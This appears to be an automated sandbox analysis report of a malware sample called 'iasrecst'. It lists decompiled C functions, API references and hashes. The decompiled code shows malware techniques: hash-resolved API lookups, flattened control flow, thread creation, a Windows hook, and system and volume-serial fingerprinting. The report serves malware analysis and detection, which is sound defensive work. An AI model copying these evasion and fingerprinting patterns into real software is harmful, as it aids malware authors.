0x022c70cb
0x022c70d2
0x022c70d4
0x022c70ec
0x022c70ec
0x022c70f2
0x022c70f4
0x022c70fa
0x022c70fd
0x022c7102
0x022c7104
0x022c7117
0x022c711c
0x022c711c
0x022c7123
0x022c7125
0x022c712a
0x022c712c
0x022c713f
0x022c7144
0x022c7144
0x022c7151
0x022c7062
0x022c7062
0x022c7067
0x022c7093
0x022c7098
0x00000000
0x022c7069
0x022c7069
0x022c706e
0x00000000
0x022c7070
0x022c707a
0x022c707f
0x00000000
0x022c707f
0x022c706e
0x022c7067
0x022c7060
0x00000000
0x022c70b3
0x022c70b3
0x022c70b3
0x022c70be
0x00000000

APIs

LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,022C68DC), ref: 022C70F2

Strings

.v, xrefs: 022C70F4

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .v
API String ID: 1029625771-1448102329
Opcode ID: ec9dafd6a5576f3b126c8a38cd9cfdab4519c4dd754164dcf20ebeebee2b53e0
Instruction ID: 1ef1a9d78d431b6b37e39931fca29d5c5ffe1ae0e03d89ef04a2422ffe73d781
Opcode Fuzzy Hash: ec9dafd6a5576f3b126c8a38cd9cfdab4519c4dd754164dcf20ebeebee2b53e0
Instruction Fuzzy Hash: 1C319060B342025B9A24AAE9689437B915F9BC0264F744F7EF003CB35CDEA5CD018FD2

Uniqueness

Uniqueness Score: -1.00%

Function 022C9D70, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88
threadCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E022C9D70(void* __ebx) {
				void* _t7;
				intOrPtr* _t8;
				intOrPtr* _t10;
				intOrPtr* _t16;
				intOrPtr _t17;
				void* _t20;
				void* _t25;
				intOrPtr _t27;
				void* _t40;
				void* _t41;

				_t25 = __ebx;
				_t7 = 0x94e9677;
				L1:
				while(_t7 != 0x94e9677) {
					if(_t7 == 0x11e89e6c) {
						_t16 =  *0x22cdc9c;
						if(_t16 == 0) {
							_t16 = E022C3E80(_t25, E022C3F20(0xbb398380), 0x2a635a2, _t41);
							 *0x22cdc9c = _t16;
						}
						_t17 =  *_t16(0, 0, 0, 0);
						_t27 =  *0x22ce2f0; // 0x763428
						 *((intOrPtr*)(_t27 + 0x3c)) = _t17;
						_t7 = 0x31494004;
						continue;
					} else {
						if(_t7 == 0x31494004) {
							if( *0x22cde90 == 0) {
								 *0x22cde90 = E022C3E80(_t25, E022C3F20(0xbb398380), 0x70a5bbfd, _t41);
							}
							_t20 = CreateThread(0, 0, E022C99A0, 0, 0, 0);
							_t27 =  *0x22ce2f0; // 0x763428
							 *(_t27 + 0x34) = _t20;
							L18:
							return 0 | _t27 != 0x00000000;
						} else {
							if(_t7 != 0xf4b9f58) {
								continue;
							} else {
								return 0 | _t27 != 0x00000000;
							}
						}
					}
					L19:
				}
				_t8 =  *0x22cdea8;
				if(_t8 == 0) {
					_t8 = E022C3E80(_t25, E022C3F20(0xbb398380), 0x97f883e, _t41);
					 *0x22cdea8 = _t8;
				}
				_t40 =  *_t8();
				_t10 =  *0x22cdcec;
				if(_t10 == 0) {
					_t10 = E022C3E80(_t25, E022C3F20(0xbb398380), 0xe9233692, _t41);
					 *0x22cdcec = _t10;
				}
				_t27 =  *_t10(_t40, 8, 0x40);
				 *0x22ce2f0 = _t27;
				if(_t27 == 0) {
					goto L18;
				} else {
					_t7 = 0x11e89e6c;
					goto L1;
				}
				goto L19;
			}

0x022c9d70
0x022c9d76
0x00000000
0x022c9d80
0x022c9d8c
0x022c9da9
0x022c9db0
0x022c9dc3
0x022c9dc8
0x022c9dc8
0x022c9dd5
0x022c9dd7
0x022c9ddd
0x022c9de0
0x00000000
0x022c9d8e
0x022c9d93
0x022c9e57
0x022c9e6f
0x022c9e6f
0x022c9e83
0x022c9e85
0x022c9e8b
0x022c9e8e
0x022c9e96
0x022c9d99
0x022c9d9e
0x00000000
0x022c9da0
0x022c9da8
0x022c9da8
0x022c9d9e
0x022c9d93
0x00000000
0x022c9d8c
0x022c9de7
0x022c9dee
0x022c9e01
0x022c9e06
0x022c9e06
0x022c9e0d
0x022c9e0f
0x022c9e16
0x022c9e29
0x022c9e2e
0x022c9e2e
0x022c9e3a
0x022c9e3c
0x022c9e44
0x00000000
0x022c9e46
0x022c9e46
0x00000000
0x022c9e46
0x00000000

APIs

CreateThread.KERNELBASE(00000000,00000000,022C99A0,00000000,00000000,00000000), ref: 022C9E83

Strings

(4v, xrefs: 022C9D70, 022C9DD7, 022C9E3C, 022C9E85

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: (4v
API String ID: 2422867632-3411274164
Opcode ID: 153490bf00356740f301acb5c9670a1dea8d093414ab581d346fa12c4604f7dd
Instruction ID: 403d2409dca565ac9926fe9e2fa35e04c2be12ff3f01ddc4cf3836073ba5bdb0
Opcode Fuzzy Hash: 153490bf00356740f301acb5c9670a1dea8d093414ab581d346fa12c4604f7dd
Instruction Fuzzy Hash: CD21B670B61302ABDB14EAF4A9557792292BF80740F308D6DF506DB2C8EF71D8508BC6

Uniqueness

Uniqueness Score: -1.00%

Function 022C5360, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E022C5360(void* __ebx, void* __ebp) {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				void* _t8;
				intOrPtr* _t16;
				intOrPtr* _t19;
				void* _t22;
				void* _t31;
				void* _t32;
				void* _t35;

				_t32 = __ebp;
				_t22 = __ebx;
				_t8 = 0x26a841ee;
				_t31 = 0;
				goto L1;
				do {
					while(1) {
						L1:
						_t35 = _t8 - 0x1fae9e92;
						if(_t35 > 0) {
							break;
						}
						if(_t35 == 0) {
							_t31 = _t31 + _v280 * 0x3e8;
							_t8 = 0x2e629178;
							continue;
						} else {
							if(_t8 == 0x41b9e46) {
								return (_v320 & 0x0000ffff) + _t31;
							} else {
								if(_t8 == 0xb2cdcb1) {
									_t16 =  *0x22cdb30;
									if(_t16 == 0) {
										_t16 = E022C3E80(_t22, E022C3F20(0xbb398380), 0xa4407471, _t32);
										 *0x22cdb30 = _t16;
									}
									 *_t16( &_v320); // executed
									_t8 = 0x22049820;
									continue;
								} else {
									if(_t8 != 0x142f3962) {
										goto L17;
									} else {
										_t19 =  *0x22cdedc;
										_v284 = 0x11c;
										if(_t19 == 0) {
											_t19 = E022C3E80(_t22, E022C3F20(0xe66945e6), 0x69e48357, _t32);
											 *0x22cdedc = _t19;
										}
										 *_t19( &_v284);
										_t8 = 0xb2cdcb1;
										continue;
									}
								}
							}
						}
						L22:
					}
					if(_t8 == 0x22049820) {
						_t31 = _t31 + (_v2 & 0x000000ff) * 0x186a0;
						_t8 = 0x1fae9e92;
						goto L1;
					} else {
						if(_t8 == 0x26a841ee) {
							_t8 = 0x142f3962;
							goto L1;
						} else {
							if(_t8 != 0x2e629178) {
								goto L17;
							} else {
								_t31 = _t31 + _v276 * 0x64;
								_t8 = 0x41b9e46;
								goto L1;
							}
						}
					}
					goto L22;
					L17:
				} while (_t8 != 0x135ed498);
				return _t31;
				goto L22;
			}

0x022c5360
0x022c5360
0x022c5366
0x022c536c
0x022c536c
0x022c5370
0x022c5370
0x022c5370
0x022c5370
0x022c5375
0x00000000
0x00000000
0x022c537b
0x022c5415
0x022c5417
0x00000000
0x022c5381
0x022c5386
0x022c548e
0x022c538c
0x022c5391
0x022c53d8
0x022c53df
0x022c53f2
0x022c53f7
0x022c53f7
0x022c5401
0x022c5403
0x00000000
0x022c5393
0x022c5398
0x00000000
0x022c539e
0x022c539e
0x022c53a3
0x022c53ad
0x022c53c0
0x022c53c5
0x022c53c5
0x022c53cf
0x022c53d1
0x00000000
0x022c53d1
0x022c5398
0x022c5391
0x022c5386
0x00000000
0x022c537b
0x022c5426
0x022c5474
0x022c5476
0x00000000
0x022c5428
0x022c542d
0x022c545c
0x00000000
0x022c542f
0x022c5434
0x00000000
0x022c5436
0x022c543b
0x022c543d
0x00000000
0x022c543d
0x022c5434
0x022c542d
0x00000000
0x022c5447
0x022c5447
0x022c545b
0x00000000

APIs

GetNativeSystemInfo.KERNELBASE(2564BE4F,2564BE4F), ref: 022C5401

Strings

Ei, xrefs: 022C53AF

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: Ei
API String ID: 1721193555-3988083245
Opcode ID: 5bfa629e00d6c181261bab0e52732fd94a6bd2dd854f2e26a12f81efa3d7959d
Instruction ID: cb4a232ada70bede401251e419383f49cce261406a22db4cf017ef28b61aac72
Opcode Fuzzy Hash: 5bfa629e00d6c181261bab0e52732fd94a6bd2dd854f2e26a12f81efa3d7959d
Instruction Fuzzy Hash: F121D871A3435187C6249AEC95C42AF65915B942C8FF44B3EE449FF258DB78E9208BC2

Uniqueness

Uniqueness Score: -1.00%

Function 022C6F10, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
libraryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E022C6F10(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t9;
				intOrPtr _t17;
				signed int _t28;
				void* _t29;
				WCHAR* _t30;
				void* _t31;

				_t15 = __ebx;
				_t28 = __edx;
				_t30 = E022C34C0(__ecx);
				if( *0x22cddc4 == 0) {
					 *0x22cddc4 = E022C3E80(__ebx, E022C3F20(0xbb398380), 0x9261db99, _t31);
				}
				_t6 = LoadLibraryW(_t30);
				_t17 =  *0x22ce2e8; // 0x762ee0
				 *(_t17 + 0xc + _t28 * 4) = _t6;
				_t7 =  *0x22cdea8;
				if(_t7 == 0) {
					_t7 = E022C3E80(_t15, E022C3F20(0xbb398380), 0x97f883e, _t31);
					 *0x22cdea8 = _t7;
				}
				_t29 =  *_t7();
				_t9 =  *0x22ce1a0;
				if(_t9 == 0) {
					_t9 = E022C3E80(_t15, E022C3F20(0xbb398380), 0x26c3f343, _t31);
					 *0x22ce1a0 = _t9;
				}
				return  *_t9(_t29, 0, _t30);
			}

0x022c6f10
0x022c6f12
0x022c6f19
0x022c6f22
0x022c6f3a
0x022c6f3a
0x022c6f40
0x022c6f42
0x022c6f48
0x022c6f4c
0x022c6f53
0x022c6f66
0x022c6f6b
0x022c6f6b
0x022c6f72
0x022c6f74
0x022c6f7b
0x022c6f8e
0x022c6f93
0x022c6f93
0x022c6fa0

APIs

LoadLibraryW.KERNELBASE(00000000,?,2564BE4F,022C704F,022C68DC), ref: 022C6F40

Strings

.v, xrefs: 022C6F42

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .v
API String ID: 1029625771-1448102329
Opcode ID: fd2ae72ee5b7b7048b508340f2a85566e62e86fb454fdc6921cb1b4f5008a460
Instruction ID: 06560ecd741022a9c003db70b669c0412a9722a1fd1d8802b2d3169aba92ba43
Opcode Fuzzy Hash: fd2ae72ee5b7b7048b508340f2a85566e62e86fb454fdc6921cb1b4f5008a460
Instruction Fuzzy Hash: EA012C75B51201AB9714FAF5B45466A26A7AFC02947348D6DF006CB348EE349C128BD1

Uniqueness

Uniqueness Score: -1.00%

Function 022C5BC0, Relevance: 3.1, APIs: 2, Instructions: 74
memoryCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E022C5BC0(void* __ecx, void* __edx, void* __ebp) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __ebx;
				intOrPtr* _t3;
				void* _t6;
				intOrPtr* _t9;
				void* _t20;
				void* _t21;
				void* _t38;
				void* _t39;
				void* _t40;
				void* _t41;

				_t42 = __ebp;
				_t3 =  *0x22cdea8;
				_t20 = __ecx;
				_t38 = __edx;
				if(_t3 == 0) {
					_t3 = E022C3E80(_t20, E022C3F20(0xbb398380), 0x97f883e, __ebp);
					 *0x22cdea8 = _t3;
				}
				_t40 =  *_t3();
				if( *0x22cdcec == 0) {
					 *0x22cdcec = E022C3E80(_t20, E022C3F20(0xbb398380), 0xe9233692, _t42);
				}
				_t6 = RtlAllocateHeap(_t40, 8, 0x40000); // executed
				_t41 = _t6;
				if(_t41 == 0) {
					return 0;
				} else {
					_push(_t41);
					_push(_v0);
					_push(_v4);
					_t21 = E022C5880(_t20, _t38);
					_t9 =  *0x22cdea8;
					if(_t9 == 0) {
						_t9 = E022C3E80(_t21, E022C3F20(0xbb398380), 0x97f883e, _t42);
						 *0x22cdea8 = _t9;
					}
					_t39 =  *_t9();
					if( *0x22ce1a0 == 0) {
						 *0x22ce1a0 = E022C3E80(_t21, E022C3F20(0xbb398380), 0x26c3f343, _t42);
					}
					RtlFreeHeap(_t39, 0, _t41); // executed
					return _t21;
				}
			}

0x022c5bc0
0x022c5bc0
0x022c5bc6
0x022c5bca
0x022c5bce
0x022c5be1
0x022c5be6
0x022c5be6
0x022c5bed
0x022c5bf6
0x022c5c0e
0x022c5c0e
0x022c5c1b
0x022c5c1d
0x022c5c21
0x022c5c97
0x022c5c23
0x022c5c23
0x022c5c24
0x022c5c2c
0x022c5c35
0x022c5c3a
0x022c5c41
0x022c5c54
0x022c5c59
0x022c5c59
0x022c5c60
0x022c5c69
0x022c5c81
0x022c5c81
0x022c5c8a
0x022c5c91
0x022c5c91

APIs

RtlAllocateHeap.NTDLL(00000000,00000008,00040000), ref: 022C5C1B
RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 022C5C8A

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFree
String ID:
API String ID: 2488874121-0
Opcode ID: cf5526e98541b7475d1bb747cf93d0744efe70cfc233e9d17b95fd965b55836e
Instruction ID: 5a5867c3202f19b64a7788ff53f5327ba8e7f033974689e8310df4a467030d15
Opcode Fuzzy Hash: cf5526e98541b7475d1bb747cf93d0744efe70cfc233e9d17b95fd965b55836e
Instruction Fuzzy Hash: 3711AFB2F512026BD714AAF8A89476B6697AFC02907748D7CF405DB348EE60CD214BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00412710, Relevance: 3.0, APIs: 2, Instructions: 27
threadCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00412710() {
				void* _t6;
				void* _t7;
				struct HHOOK__* _t9;
				void* _t18;

				_t6 = E00424BFB();
				if( *((char*)(_t6 + 0x14)) == 0) {
					_t7 = E004249C4();
					_t9 = SetWindowsHookExA(0xffffffff, E00412A65, 0, GetCurrentThreadId()); // executed
					_push(E00424441);
					 *(_t7 + 0x30) = _t9;
					_t18 = E00425D27(0x439c50);
					if( *((intOrPtr*)(_t18 + 0x14)) != 0) {
						 *((intOrPtr*)(_t18 + 0x14))( *((intOrPtr*)(E00424BFB() + 8)));
					}
					return E00425C92(0x439c4c, E00424456);
				}
				return _t6;
			}

0x00412710
0x00412719
0x0041271c
0x00412733
0x00412739
0x00412743
0x0041274b
0x00412751
0x0041275b
0x0041275b
0x00000000
0x0041276d
0x0041276e

APIs

GetCurrentThreadId.KERNEL32 ref: 00412723
SetWindowsHookExA.USER32 ref: 00412733

Part of subcall function 00425D27: __EH_prolog.LIBCMT ref: 00425D2C

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: CurrentH_prologHookThreadWindows
String ID:
API String ID: 2183259885-0
Opcode ID: 82dfa06e578934c154c706557db465714f2c1539f2333c53d4548f0f4d9798f3
Instruction ID: e1aa810c2eef3cfbe5d0c04a06800172916402ab6d7e5109c2f22e34ec283244
Opcode Fuzzy Hash: 82dfa06e578934c154c706557db465714f2c1539f2333c53d4548f0f4d9798f3
Instruction Fuzzy Hash: 59F020313006302BCB307B70BA0EB5A2A90DF44318F804A1BF0619A0E2CBBC8C80C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040796F, Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040796F(intOrPtr _a4) {
				void* _t6;
				void* _t9;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x43b63c = _t6;
				if(_t6 == 0) {
					L3:
					return 0;
				} else {
					if(E00407A4A() != 0) {
						_t9 = 1;
						return _t9;
					} else {
						HeapDestroy( *0x43b63c);
						goto L3;
					}
				}
			}

0x00407980
0x00407988
0x0040798d
0x004079a4
0x004079a6
0x0040798f
0x00407996
0x004079a9
0x004079aa
0x00407998
0x0040799e
0x00000000
0x0040799e
0x00407996

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,004063E6,00000001), ref: 00407980

Part of subcall function 00407A4A: HeapAlloc.KERNEL32(00000000,00000140,00407994), ref: 00407A57

HeapDestroy.KERNEL32 ref: 0040799E

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Heap$AllocCreateDestroy
String ID:
API String ID: 2236781399-0
Opcode ID: 645681982fc8d61ddb20c8e825624fd1c02a5afe8e3a61baadfadfb8e0cb624d
Instruction ID: 148b4dcf31a7c6b17fb8364a85278eb553451c51f0f99df079208ecffef983c8
Opcode Fuzzy Hash: 645681982fc8d61ddb20c8e825624fd1c02a5afe8e3a61baadfadfb8e0cb624d
Instruction Fuzzy Hash: 26E012B0755301AEEB101B31AC0677A36D4DB54782F149436F544D41F4E7B895519A4B

Uniqueness

Uniqueness Score: -1.00%

Function 02281D10, Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.496560392.0000000002281000.00000020.00000001.sdmp, Offset: 02281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2281000_iasrecst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10a16d8f003e5c39e623fc443b543789c437439620e004e684c1f662f93ecc67
Instruction ID: 2c3895ae640a2df5a6adc76a72ec0e85dfc733dcd0b98c536c7650637b846f57
Opcode Fuzzy Hash: 10a16d8f003e5c39e623fc443b543789c437439620e004e684c1f662f93ecc67
Instruction Fuzzy Hash: 8D41E875A11109EFDB04DF84C494BAAB7B2FF88314F24C159E8195F399D771EA92CB80

Uniqueness

Uniqueness Score: -1.00%

Function 022C46F0, Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E022C46F0(void* __ebx, void* __edx, void* __ebp) {
				char _v16;
				void* __ecx;
				intOrPtr* _t2;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr* _t7;
				void* _t14;
				void* _t27;
				void* _t29;
				void* _t32;
				void* _t33;
				intOrPtr* _t37;

				_t36 = __ebp;
				_t13 = __ebx;
				_t2 =  *0x22cdea4;
				 *_t37 = 0x104;
				_t32 = _t14;
				_t27 = __edx;
				if(_t2 == 0) {
					_t2 = E022C3E80(__ebx, E022C3F20(0xbb398380), 0x4791debe, __ebp);
					 *0x22cdea4 = _t2;
				}
				_t33 =  *_t2(0x1000, 0, _t32);
				if(_t33 == 0) {
					return 0;
				} else {
					_t5 =  *0x22cdf2c;
					if(_t5 == 0) {
						_t5 = E022C3E80(_t13, E022C3F20(0xbb398380), 0xd0ee7032, _t36);
						 *0x22cdf2c = _t5;
					}
					_t6 =  *_t5(_t33, 0, _t27,  &_v16); // executed
					_t29 = _t6;
					_t7 =  *0x22cdc70;
					if(_t7 == 0) {
						_t7 = E022C3E80(_t13, E022C3F20(0xbb398380), 0x560d239b, _t36);
						 *0x22cdc70 = _t7;
					}
					 *_t7(_t33);
					return _t29;
				}
			}

0x022c46f0
0x022c46f0
0x022c46f1
0x022c46f6
0x022c46fe
0x022c4701
0x022c4705
0x022c4718
0x022c471d
0x022c471d
0x022c472c
0x022c4730
0x022c4795
0x022c4732
0x022c4732
0x022c4739
0x022c474c
0x022c4751
0x022c4751
0x022c475f
0x022c4761
0x022c4763
0x022c476a
0x022c477d
0x022c4782
0x022c4782
0x022c4788
0x022c478f
0x022c478f

APIs

QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,2564BE4F), ref: 022C475F

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: e9c5bfbfdc09a94ce441cd68e917eccf0e144e1ffde05b9d0eaf77785fcae115
Instruction ID: d73062332bb256ab2c64873deff8358c1a48726dacf023fe11f69ff29289bcb0
Opcode Fuzzy Hash: e9c5bfbfdc09a94ce441cd68e917eccf0e144e1ffde05b9d0eaf77785fcae115
Instruction Fuzzy Hash: 0601C4B5B512026BD314A6F9B824BAB22E7AFC4290B344E7DF445CB248EF708C018BD0

Uniqueness

Uniqueness Score: -1.00%

Function 022C5490, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E022C5490(void* __ebx, void* __ebp) {
				char _v520;
				short _v528;
				long _v532;
				intOrPtr* _t7;
				short* _t10;
				WCHAR** _t28;

				_t27 = __ebp;
				_t16 = __ebx;
				_t7 =  *0x22ce1b8;
				 *_t28 = 0;
				if(_t7 == 0) {
					_t7 = E022C3E80(__ebx, E022C3F20(0xbb398380), 0x61bf6c0c, __ebp);
					 *0x22ce1b8 = _t7;
				}
				_push(0x104);
				_push( &_v520);
				if( *_t7() != 0) {
					_t10 =  &_v528;
					if(_v528 != 0) {
						while( *_t10 != 0x5c) {
							_t10 = _t10 + 2;
							if( *_t10 != 0) {
								continue;
							} else {
							}
							goto L9;
						}
						 *((short*)(_t10 + 2)) = 0;
					}
					L9:
					if( *0x22ce23c == 0) {
						 *0x22ce23c = E022C3E80(_t16, E022C3F20(0xbb398380), 0x8837cb40, _t27);
					}
					GetVolumeInformationW( &_v528, 0, 0,  &_v532, 0, 0, 0, 0); // executed
				}
				return _v532;
			}

0x022c5490
0x022c5490
0x022c5496
0x022c549b
0x022c54a4
0x022c54b7
0x022c54bc
0x022c54bc
0x022c54c1
0x022c54ca
0x022c54cf
0x022c54d7
0x022c54db
0x022c54e0
0x022c54e6
0x022c54ed
0x00000000
0x00000000
0x022c54ef
0x00000000
0x022c54ed
0x022c54f3
0x022c54f3
0x022c54f7
0x022c54fe
0x022c5516
0x022c5516
0x022c5531
0x022c5531
0x022c553c

APIs

GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 022C5531

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 0593f2a90816bb21d7494fea44884b6ef65d307ce9510fe1c6d8b9ee99391562
Instruction ID: ae922cec76f1f0fdc84009c72ac586829712547bd32cd9b77a6eceaf5a2adf2f
Opcode Fuzzy Hash: 0593f2a90816bb21d7494fea44884b6ef65d307ce9510fe1c6d8b9ee99391562
Instruction Fuzzy Hash: 0C11A970A60301ABE724DBE4D855B7673E5BF80700FA48A1CF545DB1C4EBB8E954CB92

Uniqueness

Uniqueness Score: -1.00%

Function 022827B0, Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 022827D9

Memory Dump Source

Source File: 00000001.00000002.496560392.0000000002281000.00000020.00000001.sdmp, Offset: 02281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2281000_iasrecst.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: dbf26268d4e41ecef4692ec5f53c91e31e226f631c0e7ef2e709cd20bc9cf437
Instruction ID: da79c1bb74e1fa511374dcf236dc282abb1d87abef4b94b39608f5a832fbbb76
Opcode Fuzzy Hash: dbf26268d4e41ecef4692ec5f53c91e31e226f631c0e7ef2e709cd20bc9cf437
Instruction Fuzzy Hash: 2ED09EB4D51208FFE744FFE4E94AA9DBBB4EB04701F108165E9096B284E6709A14CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00408198, Relevance: 1.3, APIs: 1, Instructions: 85
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00408198(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _t45;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t54;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				void* _t69;
				void* _t70;
				void* _t77;
				signed int _t78;
				intOrPtr _t81;

				_t60 = _a4;
				_t81 =  *((intOrPtr*)(_t60 + 0x10));
				_t45 =  *(_t60 + 8);
				_t57 = 0;
				while(_t45 >= 0) {
					_t45 = _t45 << 1;
					_t57 = _t57 + 1;
				}
				_t69 = 0x3f;
				_t48 = _t57 * 0x204 + _t81 + 0x144;
				_v8 = _t48;
				do {
					 *((intOrPtr*)(_t48 + 8)) = _t48;
					 *((intOrPtr*)(_t48 + 4)) = _t48;
					_t48 = _t48 + 8;
					_t69 = _t69 - 1;
				} while (_t69 != 0);
				_t77 = (_t57 << 0xf) +  *((intOrPtr*)(_t60 + 0xc));
				_t49 = VirtualAlloc(_t77, 0x8000, 0x1000, 4); // executed
				if(_t49 != 0) {
					_t70 = _t77 + 0x7000;
					if(_t77 <= _t70) {
						_t55 = _t77 + 0x10;
						do {
							 *(_t55 - 8) =  *(_t55 - 8) | 0xffffffff;
							 *(_t55 + 0xfec) =  *(_t55 + 0xfec) | 0xffffffff;
							 *((intOrPtr*)(_t55 - 4)) = 0xff0;
							 *_t55 = _t55 + 0xffc;
							 *((intOrPtr*)(_t55 + 4)) = _t55 - 0x1004;
							 *((intOrPtr*)(_t55 + 0xfe8)) = 0xff0;
							_t55 = _t55 + 0x1000;
